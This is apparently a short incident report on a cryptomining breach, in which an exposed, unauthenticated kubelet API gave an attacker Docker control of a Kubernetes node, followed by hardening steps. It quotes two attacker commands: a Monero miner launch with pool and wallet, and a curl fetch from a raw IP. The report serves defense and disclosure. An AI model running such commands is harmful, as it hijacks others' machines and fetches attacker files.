How a Misconfigured Kubelet Triggered a Crypto‑Mining Breach—and How to Stop It

Incident Overview

During routine checks we discovered that one node in our self‑built Kubernetes cluster was being used for cryptocurrency mining. The attacker exploited a misconfigured kubelet to gain Docker control and run a Monero miner.

./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
curl -s http://45.9.148.35/scan_threads.dat

Investigation Findings

Empty iptables

The node had no firewall rules, leaving it exposed.

Kubelet exposure

Logs showed abnormal activity from the kubelet component. The kubelet was configured to allow unauthenticated access to its API, and the startup parameters mistakenly commented out the security settings that block anonymous access.

Improvement Measures

Enforce host‑level firewall rules; default to deny all inbound traffic and only open ports after verification.

Avoid assigning public IPs to nodes that do not require external access.

Bind services like kubelet to the internal network IP instead of 0.0.0.0 .

Disable anonymous API access and implement proper authentication/authorization mechanisms.

Adopt scripted, auditable procedures for production changes rather than manual ad‑hoc commands.

Conclusion

The breach gave the attacker full Docker control on the compromised node, highlighting the severity of exposing kubelet APIs and neglecting firewall protection. Strengthening host firewalls and restricting unnecessary ports are quick, effective steps to improve cluster security.